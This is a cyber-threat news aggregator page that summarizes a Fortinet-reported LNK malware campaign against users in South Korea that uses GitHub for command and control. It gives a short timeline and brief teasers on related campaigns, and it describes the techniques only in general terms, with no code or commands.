Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Malicious LNK GitHub C2 campaign targeting South Korea

Campaign
First reported
Last updated
Happening score
H score 33
1 unique sources, 1 articles

Summary

Hide ▲

A malicious LNK-file campaign targeting users in South Korea is using GitHub as C2 to support persistent access on Windows systems. The operation relies on PowerShell, scheduled tasks, and decoy PDFs to stay hidden while malicious code runs. Recent variants add embedded decoding logic and encoded payloads, showing an evolving threat that has continued since 2024.

Related Happenings

Shai-Hulud supply-chain campaign spreading via stolen CI/CD credentials

Campaign
First: 12.05.2026 14:29 Last: 12.05.2026 14:29 Sources 1

About this happening: The **Shai-Hulud** **supply-chain campaign** remains active across **npm**, **PyPI**, and **Composer**, with the latest reporting tying **TeamPCP** to both a claimed **GitHub inte...

Open Happening

EtherRAT malicious MSI loader with Ethereum-based C2

Malware Activity
First: 30.04.2026 14:30 Last: 30.04.2026 14:30 Sources 1

About this happening: The **EtherRAT** malware is being delivered through **malicious MSI installers** and gives attackers **persistent Windows access**, increasing the risk of covert control inside en...

Open Happening

Famous Chollima PromptMink supply-chain campaign targeting Web3 developers

Campaign
First: 29.04.2026 17:43 Last: 29.04.2026 17:43 Sources 1

About this happening: The **PromptMink** campaign is widening **Famous Chollima**'s supply-chain intrusion playbook by pushing **tainted npm packages** into developer environments and stealing secrets....

Open Happening

Tropic Trooper trojanized SumatraPDF remote-access campaign

Campaign
First: 24.04.2026 12:29 Last: 24.04.2026 12:29 Sources 1

About this happening: **Tropic Trooper** is running an active **campaign** that uses a **trojanized SumatraPDF** lure to plant **AdaptixC2 Beacon** and later abuse **VS Code tunnels** for remote access...

Open Happening

Transparent Tribe AI-assisted implant campaign targeting India

Campaign
First: 06.03.2026 17:11 Last: 06.03.2026 17:11 Sources 1

About this happening: **Transparent Tribe (APT36)** is using **AI-powered coding tools** to mass-produce disposable implants in an active **campaign** targeting the **Indian government**, its embassies...

Open Happening

Timeline

  1. 02.04.2026 16:00 2 articles · 1mo ago

    Fortinet advisory describes South Korea LNK malware campaign using GitHub C2

    Technical Analysis Update

    Fortinet published an advisory describing a malicious LNK-file campaign targeting users in South Korea that uses GitHub as command and control (C2). The operation relies on hidden scripts, encoded payloads, PowerShell, VBScript, scheduled tasks, decoy PDF documents, and Windows built-in tools to maintain persistence, exfiltrate system information, and evade detection, while later variants add decoding functions directly in LNK arguments and remove identifying metadata; earlier versions of the attack date back to 2024.

    Show sources
    Open in new tab